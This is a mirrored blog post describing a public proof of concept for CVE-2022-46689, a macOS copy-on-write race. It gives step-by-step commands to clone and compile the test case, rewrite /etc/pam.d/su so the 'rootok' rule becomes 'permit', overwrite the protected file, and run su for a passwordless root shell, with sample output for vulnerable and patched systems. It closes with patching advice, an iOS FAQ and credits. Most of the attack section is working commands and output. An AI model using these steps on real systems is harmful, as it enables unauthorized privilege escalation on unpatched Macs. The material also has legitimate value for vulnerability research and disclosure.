Get root on macOS 13.0.1 with CVE-2022-46689, the macOS Dirty Cow bug
source link: https://worthdoingbadly.com/macdirtycow/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Get root on macOS 13.0.1 with CVE-2022-46689, the macOS Dirty Cow bug
Dec 17, 2022
Get root on macOS 13.0.1 with CVE-2022-46689 (macOS equivalent of the Dirty Cow bug), using the testcase extracted from Apple’s XNU source.
Usage
On a macOS 13.0.1 / 12.6.1 (or below) machine, clone the extracted test case:
git clone https://github.com/zhuowei/MacDirtyCowDemo
Then run:
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su
You should get:
% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2#
Tested on macOS 13 beta (22A5266r) with SIP off (it should still work with SIP on).
If your system is fully patched (macOS 13.1 / 12.6.2), it should instead read:
$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure
and running su
should still ask for a password.
Thanks to Sealed System Volume, running this on any file on the /System
volume only modifies the file temporarily: It’s reverted on reboot. Running it on a file on a writeable volume will preserve the modification after a reboot.
Should I be worried?
If you installed the latest macOS update (macOS 13.1 / 12.6.2 / 11.7.2), you should be fine.
If you haven’t, do it now.
Will this be useful for iOS jailbreak?
Probably not.
This - as far as I can tell - affects userspace processes only. Jailbreaks require a kernel exploit. (The Apple Security release notes says that this bug may allow “arbitrary code with kernel privileges”, but I can’t see how.)
You might still do something cool on iOS with this, but I’m not sure what you’d overwrite: codesigning should protect all executables and libraries. (I have not tested this: let me know if you find anything!)
Credits
- Ian Beer of Project Zero for finding this issue, and for finding other issues in XNU’s virtual memory. Looking forward to the writeup for this issue.
- Apple for the test case and patch. (I didn’t change anything: I just added the command line parameter to control what to overwrite.)
- SSLab@Gatech for the trick to disable password checking using
/etc/pam.d
. - @WangTielei for sharing a related issue and answering my questions.
Changelog
2022-12-17:
- clarified that “jailbreak” refers to iOS.
- clarified that the Project Zero issue link goes to a different issue than this one.
- link the patch in
vm_map_copy_overwrite_unaligned
.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK